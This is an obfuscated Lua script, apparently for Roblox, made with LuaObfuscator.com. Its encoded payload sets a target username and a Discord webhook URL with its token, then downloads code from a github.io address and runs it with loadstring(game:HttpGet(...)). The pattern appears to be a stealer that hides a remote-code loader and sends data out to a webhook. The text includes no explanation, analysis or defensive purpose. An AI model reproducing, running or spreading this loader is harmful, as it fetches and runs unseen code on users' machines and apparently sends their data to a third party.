--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v31=0 -0 ;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if ((3 + 1)~=v31) then else while true do if (v32==1) then local v86=0;while true do if (v86==0) then v35=nil;v36=nil;v86=1;end if (v86==(1 + 0)) then v32=2;break;end end end if (v32==0) then v33=0;v34=nil;v32=1910 -(1539 + 370) ;end if (v32==2) then v37=nil;v38=nil;v32=3;end if (v32==3) then v39=nil;while true do local v87=285 -(112 + 173) ;local v88;while true do if (v87~=(0 -0)) then else v88=0;while true do if (v88~=(163 -(23 + 139))) then else if (v33==1) then local v107=0;local v108;while true do if (v107~=0) then else v108=1577 -(948 + 629) ;while true do if (v108~=0) then else local v120=0 + 0 ;while true do if (v120==(472 -(286 + 186))) then v38=v24();v39={};v120=1 + 0 ;end if (v120==1) then v108=1;break;end end end if (2~=v108) then else v33=2 -0 ;break;end if (v108==(219 -(169 + 49))) then local v121=0;while true do if (v121==1) then v108=999 -(333 + 664) ;break;end if (v121==0) then for v152=1,v38 do local v153=0 -0 ;local v154;local v155;local v156;while true do if (v153==(1 + 0)) then v156=nil;while true do if (v154==(2 -1)) then if (v155==(1 + 0)) then v156=v22()~=(0 -0) ;elseif (v155==(3 -1)) then v156=v25();elseif (v155==3) then v156=v26();end v39[v152]=v156;break;end if (v154==(1287 -(1284 + 3))) then local v171=0 + 0 ;while true do if (v171~=0) then else v155=v22();v156=nil;v171=1;end if (v171==1) then v154=1;break;end end end end break;end if (v153~=(0 -0)) then else v154=290 -(149 + 141) ;v155=nil;v153=1;end end end v37[942 -(417 + 522) ]=v22();v121=649 -(431 + 217) ;end end end end break;end end end break;end if (v88==(1571 -(1246 + 325))) then if ((1538 -(735 + 801))==v33) then local v109=443 -(182 + 261) ;while true do if ((0 -0)==v109) then for v113=3 -2 ,v24() do local v114=0;local v115;while true do if (v114==0) then v115=v22();if (v21(v115,1,302 -(88 + 213) )==0) then local v142=0;local v143;local v144;local v145;local v146;local v147;while true do if (v142==(1 -0)) then v145=nil;v146=nil;v142=2 + 0 ;end if (v142==2) then v147=nil;while true do if (1~=v143) then else local v168=0 -0 ;while true do if (v168==(0 + 0)) then v146=nil;v147=nil;v168=1;end if (v168~=1) then else v143=2;break;end end end if (v143==(0 -0)) then local v169=0;while true do if (v169~=(529 -(454 + 75))) then else v144=0;v145=nil;v169=1 + 0 ;end if (v169==1) then v143=1;break;end end end if (v143~=2) then else while true do if (v144~=3) then else if (v21(v146,11 -8 ,2 + 1 )~=1) then else v147[7 -3 ]=v39[v147[1225 -(557 + 664) ]];end v34[v113]=v147;break;end if ((1451 -(969 + 480))~=v144) then else local v173=0;local v174;while true do if (v173==0) then v174=0 + 0 ;while true do if (v174==1) then v144=3;break;end if (v174==0) then local v182=765 -(572 + 193) ;while true do if (v182~=(1766 -(309 + 1457))) then else if (v21(v146,1,1)~=(1 + 0)) then else v147[5 -3 ]=v39[v147[6 -4 ]];end if (v21(v146,2,262 -(209 + 51) )==(1 -0)) then v147[3 + 0 ]=v39[v147[3 + 0 ]];end v182=1 + 0 ;end if (v182~=(1342 -(178 + 1163))) then else v174=1 + 0 ;break;end end end end break;end end end if (v144==1) then local v175=1866 -(257 + 1609) ;while true do if (v175~=(0 + 0)) then else local v179=0;while true do if (v179~=1) then else v175=1;break;end if (v179==0) then v147={v23(),v23(),nil,nil};if (v145==(1021 -(513 + 508))) then local v183=0 -0 ;local v184;local v185;while true do if ((482 -(371 + 110))~=v183) then else while true do if (0==v184) then v185=0;while true do if (v185~=(0 + 0)) then else v147[3]=v23();v147[4 + 0 ]=v23();break;end end break;end end break;end if (0~=v183) then else v184=173 -(157 + 16) ;v185=nil;v183=1;end end elseif (v145==1) then v147[6 -3 ]=v24();elseif (v145==(2 + 0)) then v147[1 + 2 ]=v24() -(2^16) ;elseif (v145==3) then local v192=0;local v193;while true do if (v192==0) then v193=0;while true do if (v193~=(0 -0)) then else v147[510 -(329 + 178) ]=v24() -((137 -(96 + 39))^16) ;v147[4]=v23();break;end end break;end end end v179=1328 -(559 + 768) ;end end end if (v175==1) then v144=2 -0 ;break;end end end if (v144~=(1458 -(578 + 880))) then else local v176=0 -0 ;while true do if (v176==(1673 -(894 + 779))) then v145=v21(v115,2 -0 ,8 -5 );v146=v21(v115,4 -0 ,6);v176=1;end if (v176==(1540 -(596 + 943))) then v144=1 -0 ;break;end end end end break;end end break;end if (0==v142) then v143=0;v144=nil;v142=2 -1 ;end end end break;end end end for v116=1,v24() do v35[v116-(1 -0) ]=v29();end v109=1 + 0 ;end if (v109~=(2 -1)) then else for v118=1 + 0 ,v24() do v36[v118]=v24();end return v37;end end end if (v33==(0 + 0)) then v34={};v35={};v36={};v37={v34,v35,nil,v36};v33=1;end v88=1;end end break;end end end break;end end break;end if (v31==(0 + 0)) then v32=0;v33=nil;v31=1 -0 ;end if (v31==(3 + 0)) then v38=nil;v39=nil;v31=4;end if (v31==(2 + 0)) then v36=nil;v37=nil;v31=3;end if (v31~=(1455 -(1097 + 357))) then else v34=nil;v35=nil;v31=5 -3 ;end end end v18=5;end if (1==v18) then function v21(v40,v41,v42)if v42 then local v68=(534 + 963) -((702 -(159 + 50)) + 1004) ;local v69;while true do if (v68==(0 -0)) then v69=(v40/((1198 -(517 + 679))^(v41-(1183 -(114 + (1556 -488))))))%((860 -(179 + (3116 -2437)))^(((v42-(1 -0)) -(v41-(3 -2))) + (1415 -(447 + 967)))) ;return v69-(v69%(1181 -(328 + 852))) ;end end else local v70=(2 + 0)^(v41-(1 -(0 + 0))) ;return (((v40%(v70 + v70))>=v70) and (1 -0)) or 0 ;end end v22=nil;function v22()local v43=v1(v16,v19,v19);v19=v19 + 1 ;return v43;end v23=nil;v18=2;end if (v18==5) then v30=nil;function v30(v44,v45,v46)local v47=0;local v48;local v49;local v50;while true do if (v47==1) then v50=v44[3];return function(...)local v76=0;local v77;local v78;local v79;local v80;local v81;while true do if (v76==0) then v77=1;v78= -1;v76=1;end if (3==v76) then A,B=v28(v11(v81));if  not A[1] then local v99=v44[4][v77] or "?" ;error("Script error at ["   .. v99   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end if (1==v76) then v79={...};v80=v12("#",...) -1 ;v76=2;end if (v76==2) then v81=nil;function v81()local v89=v48;local v90=v49;local v91=v50;local v92=v28;local v93={};local v94={};local v95={};for v100=0 -0 ,v80 do if (((4023 -(243 + 95))==(758 + 2927)) and (v100>=v91)) then v93[v100-v91 ]=v79[v100 + 1 + 0 ];else v95[v100]=v79[v100 + 1 + 0 ];end end local v96=(v80-v91) + (1221 -(43 + 1177)) ;local v97;local v98;while true do local v101=0 -0 ;local v102;while true do if ((v101==(413 -(197 + 216))) or ((5879 -(285 + 674))<(632 + 1431))) then v102=0 + 0 ;while true do if (((5021 -(261 + 108))==(21350 -16698)) and (v102==(1354 -(246 + 1107)))) then if ((v98<=(1504 -(1360 + 140))) or ((1758 + 1092)>=(2812 + 683))) then if (((9146 -5725)==(1047 + 2374)) and (v98<=(2 -1))) then if ((v98==(0 + 0)) or ((13007 -9438)<=(1376 -(25 + 83 + 127)))) then v95[v97[1474 -(1215 + 257) ]]=v46[v97[3]];else v95[v97[2 + 0 ]]=v97[1 + 2 ];end elseif ((v98<=(4 -2)) or ((6012 -(167 + 847))<(8 + 7))) then local v126=0 + 0 ;local v127;local v128;while true do if ((v126==(586 -(143 + 443))) or ((397 + 660)==((411 + 2118) -(23 + 30)))) then local v148=0 -0 ;while true do if ((v148==(313 -(187 + 125))) or (((6435 -(37 + 814)) -4164)>=(2410 -(169 + 432)))) then v126=1 + 0 ;break;end if ((v148==(0 + 0)) or ((131 + 4550)<=(98 + 43))) then v127=v97[(1505 -(36 + 1389)) -(47 + 31) ];v128=v95[v97[2 + 1 ]];v148=751 -((219 -120) + 651) ;end end end if (((3023 + 219)>(195 + 484)) and ((1 + 0)==v126)) then v95[v127 + 1 + (1549 -(506 + 1043)) ]=v128;v95[v127]=v128[v97[719 -(382 + 333) ]];break;end end elseif ((3275==(4553 -(571 + 707))) and (v98>(2 + 1))) then v95[v97[1 + 1 ]]();elseif (((2026 + 540)>=(1947 + 232)) and (v95[v97[1 + 1 ]]==v97[7 -(11 -8) ])) then v77=v77 + 1 + 0 ;else v77=v97[11 -8 ];end elseif (((1324 -(14 + 616))==(1574 -(497 + 67 + 316))) and (v98<=(1652 -(1343 + 302)))) then if ((((459 -(38 + 9)) + 253)<(11657 -7184)) and (v98<=(13 -8))) then v77=v97[3 + 0 ];elseif (((899 -(357 + 207))<(2682 + 880)) and (v98>(2 + 3 + 1))) then v46[v97[3 -0 ]]=v95[v97[1 + 1 ]];else do return;end end elseif (((343 + 3192)>(1061 -(93 + 87))) and (v98<=(3 + 5))) then v95[v97[2 -0 ]]=v97[3 + 0 ]~=(0 -0) ;elseif ((v98==((1987 -1108) -(147 + 723))) or ((1985 -(9 + 489))==(862 + 2901))) then local v133=0;local v134;local v135;while true do if ((((4064 -2856) -(36 + 23))<=(4598 -(292 + 386 + 10 + 15))) and (1==v133)) then while true do if (((5717 -(141 + 1083))>=(1149 + 392)) and (v134==0)) then v135=v97[2];v95[v135]=v95[v135](v13(v95,v135 + (1287 -(495 + 791)) ,v78));break;end end break;end if (((2082 -1321)>(1 + 4)) and (v133==(0 + 0))) then v134=0 + 0 ;v135=nil;v133=1372 -((652 -455) + 1174) ;end end else local v136=1017 -(143 + 874) ;local v137;local v138;local v139;local v140;while true do if (((10246 -5586)>(904 -316)) and ((1415 -(1245 + 169))==v136)) then v78=(v139 + v137) -(1 + 0) ;v140=0 -0 ;v136=1 + 1 ;end if (((1961 -(1176 + 785))==v136) or ((9211 -6186)==(1953 -1148))) then local v158=0 -0 ;while true do if (((7268 -2589)>=((2302 + 2971) -(1202 + 590))) and (v158==(175 -(91 + 83)))) then v136=899 -(336 + 562) ;break;end if ((3366>(616 + 1307)) and (0==v158)) then v137=v97[1631 -((3127 -(210 + 1481)) + 193) ];v138,v139=v92(v95[v137](v13(v95,v137 + 1 ,v97[3])));v158=1731 -(1659 + 71) ;end end end if ((((3566 -(166 + 821)) -(670 + 205))<(9739 -4743)) and (v136==(5 -3))) then for v161=v137,v78 do local v162=0 + 0 ;local v163;local v164;while true do if ((v162==(198 -(131 + (588 -(301 + 220))))) or ((2063 -1397)<=(161 -109))) then v163=0;v164=nil;v162=1 + (0 -0) ;end if ((((10697 -5452) -2750)<=(7300 -3300)) and (v162==(1 + 0))) then while true do if (((0 + 0)==v163) or ((1328 -(766 + 207))>(3531 -(401 + 147)))) then v164=0 -0 ;while true do if (((1602 + 2275)<(639 + 3805)) and (v164==(1512 -(1024 + 488)))) then v140=v140 + ((351 + 374) -(672 + 52)) ;v95[v161]=v138[v140];break;end end break;end end break;end end end break;end end end v77=v77 + (3 -2) ;break;end if (((5747 -3485)<=(4074 -(9 + (1301 -(511 + 392))))) and (v102==(0 + 0))) then local v110=0 -0 ;while true do if ((v110==(427 -(405 + 21))) or ((3356 -846)==(5346 -((2966 -2157) + 450)))) then v102=156 -(108 + (149 -102)) ;break;end if ((v110==(0 -0)) or ((254 + 278 + 695)==(2023 -779))) then v97=v89[v77];v98=v97[(1293 -(1099 + 191)) -2 ];v110=(1320 -688) -(626 + 5) ;end end end end break;end end end end v76=3;end end end;end if (v47==0) then v48=v44[1];v49=v44[2];v47=1;end end end return v30(v29(),{},v17)(...);end if (v18==2) then function v23()local v51,v52=v1(v16,v19,v19 + 2 + 0 );v19=v19 + (1774 -(808 + 964)) ;return (v52 * 256) + v51 ;end v24=nil;function v24()local v53,v54,v55,v56=v1(v16,v19,v19 + 3 + 0 );v19=v19 + 4 + 0 ;return (v56 * (46143072 -29365856)) + (v55 * ((91645 + 136059) -162168)) + (v54 * (239 + 17)) + v53 ;end v25=nil;v18=3;end if (v18==3) then function v25()local v57=v24();local v58=v24();local v59=1;local v60=(v21(v58,567 -(101 + 465) ,14 + 6 ) * ((1 + 1)^(56 -24))) + v57 ;local v61=v21(v58,21,(58 + 50) -(92 -15) );local v62=((v21(v58,142 -110 )==((199 -(73 + 124)) -1)) and  -(1 + 0)) or (1 + 0) ;if (v61==0) then if (v60==0) then return v62 * (0 -0) ;else v61=1350 -(376 + 973) ;v59=0 + (0 -0) ;end elseif (v61==(2426 -(348 + 11 + 20))) then return ((v60==(801 -((918 -594) + 477))) and (v62 * ((1351 -(1235 + 115))/(0 -0)))) or (v62 * NaN) ;end return v8(v62,v61-(846 + 177) ) * (v59 + (v60/((230 -(47 + (490 -309)))^(1816 -(349 + 1415))))) ;end v26=nil;function v26(v63)local v64=0 + 0 ;local v65;local v66;while true do if (v64==(5 -(1 + 1))) then return v6(v66);end if (v64==(0 -0)) then v65=nil;if  not v63 then v63=v24();if (v63==(0 -0)) then return "";end end v64=1 + 0 ;end if (v64==(581 -(311 + 269))) then v65=v3(v16,v19,(v19 + v63) -(1953 -(267 + 1685)) );v19=v19 + v63 ;v64=1171 -(475 + 694) ;end if (v64==(1 + 1)) then v66={};for v82=1 -0 , #v65 do v66[v82]=v2(v1(v3(v65,v82,v82)));end v64=6 -3 ;end end end v27=v24;v18=4;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v67)if (v1(v67,2)==79) then local v71=0;while true do if (0==v71) then v20=v0(v3(v67,1,1));return "";end end else local v72=v2(v0(v67,16));if v20 then local v84=0;local v85;while true do if (0==v84) then v85=v5(v72,v20);v20=nil;v84=1;end if (1==v84) then return v85;end end else return v72;end end end);v21=nil;v18=1;end end end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F72692O7A36392E6769746875622E696F2F4D61696E2E6C756103083O00557365724E616D65030F3O002O7476736E697065732O352O33343903073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313039313631352O323734352O3338323731382F684943486C7034374E5639325954314B4741576C67546D69786A7541587762664943372D6553513952346F4F7943706F2D317A382D566F42327267557867312O45586D3400153O0012013O00013O0026033O000C000100020004053O000C000100122O000100033O00122O000200043O002002000200020005001201000400064O0008000500014O000A000200054O000900013O00022O00040001000100010004053O001400010026033O0001000100010004053O00010001001201000100083O001207000100073O0012010001000A3O001207000100093O0012013O00023O0004053O000100012O00063O00017O00153O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
